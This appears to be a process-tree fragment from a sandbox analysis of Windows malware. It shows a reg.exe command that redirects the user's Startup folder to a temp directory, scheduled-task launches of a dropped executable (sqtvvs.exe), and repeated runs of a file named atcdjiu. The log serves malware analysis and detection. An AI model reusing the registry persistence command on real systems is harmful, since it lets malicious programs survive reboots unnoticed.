C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\1⤵PID:916
-
C:\Windows\system32\taskeng.exetaskeng.exe {0F474FBB-61E0-4AD1-8E6B-DAD578A210A2} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1820
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:2104
-
-
C:\Users\Admin\AppData\Roaming\atcdjiuC:\Users\Admin\AppData\Roaming\atcdjiu2⤵PID:3056
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2608
-
-
C:\Users\Admin\AppData\Roaming\atcdjiuC:\Users\Admin\AppData\Roaming\atcdjiu2⤵PID:2536
-
-
C:\Users\Admin\AppData\Roaming\atcdjiuC:\Users\Admin\AppData\Roaming\atcdjiu2⤵PID:2276
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F0EB03B3-5CE7-44D0-8836-2B62960712D1} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1128